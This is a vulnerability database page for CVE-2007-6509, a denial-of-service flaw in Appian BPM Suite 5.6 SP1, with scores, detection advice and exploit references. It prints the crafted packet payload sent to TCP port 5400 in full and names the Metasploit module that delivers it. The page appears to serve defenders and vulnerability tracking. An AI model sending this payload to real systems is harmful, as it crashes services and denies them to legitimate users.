CVE-2007-6509
published 2007-12-21CVE-2007-6509: Unspecified vulnerability in Appian Enterprise Business Process Management (BPM) Suite 5.6 SP1 allows remote attackers to cause a denial of service via a…
PriorityP349high7.8CVSS 2.0
AVNACLAuNCNINAC
EXPLOIT
EPSS
55.17%
98.9th percentile
Unspecified vulnerability in Appian Enterprise Business Process Management (BPM) Suite 5.6 SP1 allows remote attackers to cause a denial of service via a crafted packet to port 5400/tcp.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| appian | business_process_management_suite | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlhttps://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/appian/appian_bpm.rb↗
bytes↗
\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x73\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x31\x35\x39\x36
- →Monitor for TCP connections to port 5400 delivering crafted packets matching the known DoS payload byte pattern (starting with \x02\x00\x02\x00) against Appian BPM Suite hosts. ↗
- →A public Metasploit auxiliary module (auxiliary/dos/windows/appian/appian_bpm) exists for this vulnerability; alert on its use or scan for its characteristic payload structure. ↗
- ·The vulnerability is described as 'unspecified', so the exact triggering condition beyond the crafted packet is not publicly documented; the payload from the PoC may not represent all possible exploit variants. ↗
- ·Other versions beyond 5.6 SP1 may also be vulnerable, so detection rules should not be scoped exclusively to that version. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Appian Business Process Management Suite 5.6 - Remote Denial of Service
exploitdb·2007-12-17
CVE-2007-6509 Appian Business Process Management Suite 5.6 - Remote Denial of Service
Appian Business Process Management Suite 5.6 - Remote Denial of Service
---
source: https://www.securityfocus.com/bid/26913/info
Appian Business Process Management Suite (BPMS) is prone to a remote denial-of-service vulnerability because it fails to handle specially crafted packets.
Successfully exploiting this issue allows remote attackers to crash the affected application, denying further service to legitimate users.
This issue affects Appian BPMS 5.6 SP1; other versions may be vulnerable as well.
\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x73\x61\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x00\x00\x00\x00\x00\x02\x00\
Metasploit
Appian Enterprise Business Suite 5.6 SP1 DoS
metasploit
Appian Enterprise Business Suite 5.6 SP1 DoS
Appian Enterprise Business Suite 5.6 SP1 DoS
This module exploits a denial of service flaw in the Appian Enterprise Business Suite service.
No writeups or analysis indexed.
http://marc.info/?l=full-disclosure&m=119794961212714&w=2http://secunia.com/advisories/28121http://www.osvdb.org/39500http://www.securityfocus.com/bid/26913https://exchange.xforce.ibmcloud.com/vulnerabilities/39145http://marc.info/?l=full-disclosure&m=119794961212714&w=2http://secunia.com/advisories/28121http://www.osvdb.org/39500http://www.securityfocus.com/bid/26913https://exchange.xforce.ibmcloud.com/vulnerabilities/39145
2007-12-21
Published